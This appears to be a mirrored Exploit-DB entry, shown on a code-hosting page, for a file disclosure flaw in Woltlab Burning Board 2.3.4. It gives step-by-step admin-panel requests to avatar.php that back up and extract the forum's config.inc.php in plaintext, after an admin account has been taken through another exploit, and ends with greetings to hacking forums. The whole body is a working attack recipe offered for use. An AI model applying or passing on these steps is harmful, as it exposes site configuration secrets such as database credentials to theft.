bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/15500.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

28 lines
No EOL
719 B
Text
Raw Blame History

# Exploit Title: Woltlab Burning Board 2.3.4 File Disclosure Vulnerability
# Date: 2010-11-12
# Author: SFX
# Version: 2.3.4
# CVE : N/A
After you've used the Exploit to get the admin account:
goto: http://lolcathost/wbb/acp/avatar.php?action=readfolder
import: acp/lib
download a backup: http://lolcathost/wbb/acp/avatar.php?action=backup
goto: http://lolcathost/wbb/acp/avatar.php?action=view
search for: config.inc.php
after you know the name (for example avatar-17.php), goto the zip archive
and open avatar-17.php
that's the config.inc.php in plaintext
tested under 2.3.4, maybe other versions work too
Greetz to:
free-hack.com, back2hack.cc, hackerking, Omegavirus, BlackBerry, fred777,
Red Tiger, Samsa
Reference in a new issue View git blame Copy permalink